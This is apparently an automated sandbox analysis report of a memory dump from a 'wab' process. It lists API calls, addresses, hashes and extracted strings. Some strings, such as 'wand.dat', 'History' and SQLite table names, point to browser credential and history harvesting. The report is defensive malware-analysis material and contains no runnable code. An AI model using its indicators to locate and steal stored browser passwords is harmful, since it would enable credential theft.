                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PathTemp$??3@
                                          • String ID: %s\etilqs_$etilqs_
                                          • API String ID: 1589464350-1420421710
                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                          APIs
                                          • memset.MSVCRT ref: 0040FDD5
                                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                          • String ID: <%s>%s</%s>$</item>$<item>
                                          • API String ID: 1775345501-2769808009
                                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                          APIs
                                          • wcscpy.MSVCRT ref: 0041477F
                                          • wcscpy.MSVCRT ref: 0041479A
                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy$CloseCreateFileHandle
                                          • String ID: General
                                          • API String ID: 999786162-26480598
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLastMessage_snwprintf
                                          • String ID: Error$Error %d: %s
                                          • API String ID: 313946961-1552265934
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: foreign key constraint failed$new$oid$old
                                          • API String ID: 0-1953309616
                                          APIs
                                          Strings
                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                          • API String ID: 3510742995-272990098
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: gj
                                          • API String ID: 1297977491-4203073231
                                          APIs
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                          • malloc.MSVCRT ref: 004174BD
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                          • String ID:
                                          • API String ID: 2903831945-0
                                          APIs
                                          • GetParent.USER32(?), ref: 0040D453
                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          • API String ID: 4247780290-0
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                          • memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                          • String ID:
                                          • API String ID: 1471605966-0
                                          APIs
                                          • wcscpy.MSVCRT ref: 0044475F
                                          • wcscat.MSVCRT ref: 0044476E
                                          • wcscat.MSVCRT ref: 0044477F
                                          • wcscat.MSVCRT ref: 0044478E
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                          • String ID: \StringFileInfo\
                                          • API String ID: 102104167-2245444037
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$??3@
                                          • String ID: g4@
                                          • API String ID: 3314356048-2133833424
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _memicmpwcslen
                                          • String ID: @@@@$History
                                          • API String ID: 1872909662-685208920
                                          APIs
                                          • memset.MSVCRT ref: 004100FB
                                          • memset.MSVCRT ref: 00410112
                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                          • _snwprintf.MSVCRT ref: 00410141
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                          • String ID: </%s>
                                          • API String ID: 3400436232-259020660
                                          APIs
                                          • memset.MSVCRT ref: 0040D58D
                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ChildEnumTextWindowWindowsmemset
                                          • String ID: caption
                                          • API String ID: 1523050162-4135340389
                                          APIs
                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                          • String ID: MS Sans Serif
                                          • API String ID: 210187428-168460110
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClassName_wcsicmpmemset
                                          • String ID: edit
                                          • API String ID: 2747424523-2167791130
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                          • String ID: SHAutoComplete$shlwapi.dll
                                          • API String ID: 3150196962-1506664499
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp
                                          • String ID:
                                          • API String ID: 3384217055-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          APIs
                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                          • GetMenu.USER32(?), ref: 00410F8D
                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                          APIs
                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                          • GetLastError.KERNEL32 ref: 0041810A
                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                          APIs
                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                          • memcpy.MSVCRT ref: 0042EC7A
                                          Strings
                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                          APIs
                                          • memset.MSVCRT ref: 0040560C
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.*$dat$wand.dat
                                          APIs
                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                          • wcslen.MSVCRT ref: 00410C74
                                          • _wtoi.MSVCRT ref: 00410C80
                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                          APIs
                                          • memset.MSVCRT ref: 00412057
                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                          APIs
                                          • wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                          • memcpy.MSVCRT ref: 0040A94F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocwcslen
                                          APIs
                                          • wcslen.MSVCRT ref: 0040B1DE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                          • memcpy.MSVCRT ref: 0040B248
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocwcslen
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          APIs
                                          • strlen.MSVCRT ref: 0040B0D8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                          • memcpy.MSVCRT ref: 0040B159
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          APIs
                                          • memset.MSVCRT ref: 004144E7
                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                          • memset.MSVCRT ref: 0041451A
                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: sqlite_master
                                          APIs
                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                          • wcscpy.MSVCRT ref: 00414DF3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                          APIs
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                          • _snwprintf.MSVCRT ref: 00410FE1
                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          • _snwprintf.MSVCRT ref: 0041100C
                                          • wcscat.MSVCRT ref: 0041101F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                          • malloc.MSVCRT ref: 00417459
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76F8DF80,?,0041755F,?), ref: 00417478
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$??3@malloc
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                          • RegisterClassW.USER32(?), ref: 00412428
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$Item
                                          APIs
                                          • memset.MSVCRT ref: 00417B7B
                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                          • GetLastError.KERNEL32 ref: 00417BB5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastLockUnlockmemset
                                          • String ID:
                                          • API String ID: 3727323765-0
                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
